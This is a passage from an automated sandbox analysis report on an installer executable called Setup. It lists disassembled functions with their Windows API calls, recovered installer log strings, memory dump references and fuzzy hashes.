                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                • API String ID: 565278875-1653569448
                                                                                                                                                                                                                                                                • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                                                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                                                                                                                                Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                • Opcode ID: 199461d8edf86377d08d919b3237cded7d86912c11f4486a8b12345fcf8899bb
                                                                                                                                                                                                                                                                • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 199461d8edf86377d08d919b3237cded7d86912c11f4486a8b12345fcf8899bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                                                                                                                                                Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                • Opcode ID: 798440c094ce798643cb417ce1f8564fd9d3d890bd0199b89ac5e166078e0d1f
                                                                                                                                                                                                                                                                • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 798440c094ce798643cb417ce1f8564fd9d3d890bd0199b89ac5e166078e0d1f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                                                                                                                                                Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                • API String ID: 3734993849-2769509956
                                                                                                                                                                                                                                                                • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                                                                                • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                                                                                                                                                Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                                                                                                                                Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                                                                                                                                • API String ID: 1033533793-945480824
                                                                                                                                                                                                                                                                • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                                                                                                                                Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                                                                                                                                Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
